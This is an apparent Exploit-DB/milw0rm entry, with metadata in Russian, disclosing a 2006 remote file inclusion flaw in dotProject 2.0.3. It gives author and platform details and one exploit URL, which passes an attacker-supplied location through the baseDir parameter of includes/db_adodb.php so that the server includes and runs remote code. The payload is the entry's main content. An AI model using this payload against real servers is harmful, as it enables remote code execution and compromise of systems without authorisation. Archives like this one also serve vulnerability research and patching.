Exploit dotProject 2.0.3 - 'baseDir' Remote File Inclusion

[Exploiter]

EDB-ID

1934

Проверка EDB

1. Пройдено

Автор

H4NTU

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

N/A

Дата публикации

2006-06-20

Credits : h4ntu
Title : dotProject <= 2.0.3 Remote File Inclusion
URL : http://www.dotproject.net/
Exploit : http://target.com/[dotProject_path]/includes/db_adodb.php?baseDir=[attacker] 

# milw0rm.com [2006-06-20]